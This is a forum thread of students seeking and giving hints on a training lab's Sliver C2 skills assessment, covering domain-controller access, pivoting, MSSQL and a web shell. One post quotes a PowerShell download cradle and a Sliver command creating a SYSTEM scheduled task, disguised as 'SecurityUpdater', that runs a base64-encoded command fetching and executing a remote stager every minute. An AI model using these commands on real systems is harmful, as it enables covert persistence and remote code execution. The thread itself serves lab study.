Introduction to C2 Operations with Sliver - Skills Assessment

I’ve been stuck on trying to access DC02 for days now. Anyone willing to give me a tip? I’ve rooted the foothold host and pulled all the hashes I could find. Got access to the Admin account, but it’s only the local admin. Can’t seem to gain access to the one I need to get to DC02.

I’m stuck in the same place. Have you figured it out yet?

I haven’t reached the Skills Assessment yet. I am lost in the “Assumed breach” section, “Establishing persistence” part.

It says “We will focus on the approach used in the Probing the surface section by downloading a staged.txt file”

[!bash!]$ echo -en "iex(new-object net.webclient).downloadString('')" | iconv -t UTF-16LE | base64 -w 0

And then create a scheduled task like this:

sliver (http-beacon) > execute powershell 'schtasks /create /sc minute /mo 1 /tn SecurityUpdater /tr \"powershell.exe -enc aQBlAHgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADYAMgA6ADgAMAA4ADgALwBzAHQAYQBnAGUAcgAuAHQAeAB0ACcAKQA=\" /ru SYSTEM'

I did as was written but never got a shell back. Please help!

If anyone needs help to get the third flag, feel free to hit me up.

I’m stuck at the last, If anyone have a hint, I’d appreciate

PS: I got it. Took me direct access to the host via pivot. You can also achieve it with generating a file and PtT.

bro can you give a hint to get a foothold from htb-student lol i am stuck at the beginning tried everything

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Run Sharphound

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bro i stuck at 3rd question can you help me like how did you privoted to dc02

can you give a hint please?

Did you find the script?

yeah and logged in to mssql server but i am havind a error like when i am trying uplaod a file to mssql server it freezes

bro i already hot a dc02 but can’t dump hashes always error like implant timeout and after that session closes by itself

same as well its my second day on trying to get a foothold i tried everything and im getting runtime error whenever i visit the aspx shell in the uploads directory i tried everything possible plz help anybody

With I am getting login error for felipe without -windows-auth and with -windows-auth “The login is from an untrusted domain and cannot be used with Integrated authentication”. Any hints